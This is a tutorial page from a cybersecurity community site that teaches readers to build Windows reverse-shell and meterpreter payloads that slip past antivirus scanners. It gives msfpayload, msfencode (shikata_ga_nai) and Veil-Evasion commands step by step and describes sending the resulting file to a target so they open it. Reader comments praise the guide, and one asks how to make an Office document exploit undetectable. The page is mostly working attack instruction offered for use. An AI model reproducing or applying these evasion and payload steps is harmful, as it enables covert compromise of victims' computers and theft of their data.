Tutorial: Evading Anti-Virus Software While Hacking

June 22, 2015 | Views: 23139

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hello,

When it comes to ” hacking ” into our target’s system, where most of us all fail is evading their Anti-Virus (AV).

In this tutorial, I’ll be teaching you various ways to actually by-pass the AV, so you can easily have a meterpreter session running into your target’s system without the Anti-Virus flagging your software.

AV software companies generally develop their software to look for a “signature” of viruses and other malware. In most instances, they look at the first few lines of code for a familiar pattern of known malware. When they find malware in the wild, they simply add its signature to their virus/malware database. when it next encounters that malware, the AV software alerts the computer owner.

 

First, the Prerequisites:

1. Kali Linux

2. A Quick Scanning of the target’s AV (what AV are they using, etc.)

 

Let’s get started!

METHOD 1: Changing the Payload into a C Program

In this method, we’re going to exploit the  target’s system by changing our Metasploit’s Payload into a C Language Payload so that the AV wont flag it as suspicious.

STEP 1 : Open up Kali and run msfconsole

 

STEP 2 : Generate an exploit in C

We’re going to generate an exploit in C language:

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C

 

Notice I’ve appended the command with a capital ” C “. This C tells the console to generate this payload in C Language. Once we’ve done that, we’d get similar output to this:

 

STEP 3 : Generating a Binary Code

Finally, we need to generate a binary executable for the shellcode, which we can use in our client-side attack:

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 X > setup.exe

We’ve created an executable file by using the X option, sent this file to the current folder and named the file setup.exe.
We can use this new payload in a client-side attack. The target’s AV software will unlikely have a signature for it, allowing us to stealthily place this backdoor/listener on their system.

 

METHOD 2: Encoding our Payload

We’re going to change our signature by encoding it. So, lets get started.

STEP 1: Fire up Kali and run msfconsole

 

STEP 2: Using msfencode

Let’s run msfencode -l to view the available list of encoders for us to use

We can see a lot of encoders for us to use.

Fourth from the bottom, you can see an encoder named ” shikata_ga_nai ” .

Note: It’s rated “excellent” and it’s a “Polymorphic XOR Additive Feedback Encoder “. Le’s use that one.

Whats shikata_ga_nai? This Japanese phrase translates to “nothing can be done about it.” Great name for an encoder, huh? Further, it’s an additive XOR polymorphic encoder. This means that it will change its shape/signature (polymorphic) by using an XOR encrypting scheme. XOR is far from a perfect encryption scheme, but it’s efficient and can generate multiple shapes/signatures quickly that can be decrypted by the code itself once it arrives at the target.

 

STEP 3: Re-coding our Payload with the encoder

Let’s use shikata_ga_nai to re-encode our reverse TCP shell to get it past AV software. In MSF we type:

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R |msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/cybrary_it.vbs

Here, ” | ” means generate a payload with the following extra parameters or rules etc.:

msfencode -e x86/shikata_ga_nai -c 20 -t vbs means, re-encode that payload with skikata_ga_nai and run it 20 times (-c 20), and then encode it to look like a .vbs script .

Finally, save it in root with file name cybrary_it.vbs

 

When we check our root folder, we find this:

It’s just a matter of minutes in sending the file to our target and have him open it, and boom, we got their system.

 

 

METHOD 3: Using Veil-Evasion

In this final method (of this tutorial – I cant post all 50 methods, LOL) we’re going to evade the AV one last time by using Veil-Evasion.

Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

 

STEP 1 : Installing Veil-Evasion

First, we’re going to do is install this!

Type:

root@kali > apt-get install veil-evasion

 

STEP 2: Opening Veil Evasion

To open our recently installed Veil – Evasion just type:

root@kali > veil-evasion

 

When we type that, we get this :

Veil will now begin its installation.

It will ask you whether you want to install dependencies; type ” Y ” for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select “Install for all users” and click the “Next” button. Continue to click “Next” through several screens until you finally come to a window with the “Finish” button. Click it. Eventually,  you will arrive at the screen below. We’re ready to use Veil-Evasion to create a nearly undetectable payload.

 

STEP 3 : Creating an EXE Payload

 

 

Let’s type “list” as this will list all of the payloads that Veil-Evasion can work with.

 

 

STEP 4 : Choosing a Payload

In this case, let’s use the ruby/meterpreter/rev_tcp, or number 44.

Let’s type: > use 44

When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.

 

 

We’ll need to set LHOST and LPORT:

> set LHOST 192.168.1.101

> set LPORT 4444

Of course, use the appropriate IP address and port for your circumstances.

 

Next, we need to tell Veil-Evasion to generate the executable.

> generate

 

 

 

 

 

 

 

 

 

 

As you can see in the screenshot above, Veil-Evasion has generated an new .exe file that I have named “newpayload.exe” .

 

 

STEP 5 : Generating an encrypted Payload to bypass AV

Next, let’s attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we’ll use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt.

This payload type uses VirtualAlloc injection, which creates a executable area in memory for the shellcode and then locks that memory area in physical memory.

This is number 32 on our payload list, so type: > info 32

It then returns info on this payload, as seen below.

This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.

 

Next, let’s tell Veil-Evasion we want to use this payload.

> use 32

Here, we have the option to change the default options if we care to. For now, let’s leave the default options as they are.

Then, let’s tell Veil-Evasion we want to generate this encrypted payload

> generate

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT.

 

 

When we finish entering the appropriate information for our payload, it will begin to generate the shellcode.

This can take few minutes, so be patient. Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple “veilpayload.”

 

Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.

 

Summary:

There are a lot of ways you can bypass an AV. These are the most used methods by me and my team. If you are stuck in any method or if you have any suggestions/comments/queries, feel free to message me 😉 — xMidnightSnowx

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
35 Comments
  1. Nice write up!

  2. hello bro How to Encrypt Python Exploit?
    i want to encrypt python exploit (CVE-2015-1641(.doc packed file)) build with python script., So It Can Be FUD. have you done it ever? veil easion can do it? or its only for metasploit exploits.

    any other tool or hint that encrypt this exploit?
    Thanks.

  3. this is a great tutorial, thank you

  4. Bro many thanx for your share this is usefull information.
    Also we can see you really took the time to try and explain it as simple as it can get.

    Cheers for you and keep up the good works 🙂 Here some Cybytes Tipps for yah bro 🙂

  5. This is too cool going through it!!!

Page 6 of 6« First...«23456
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel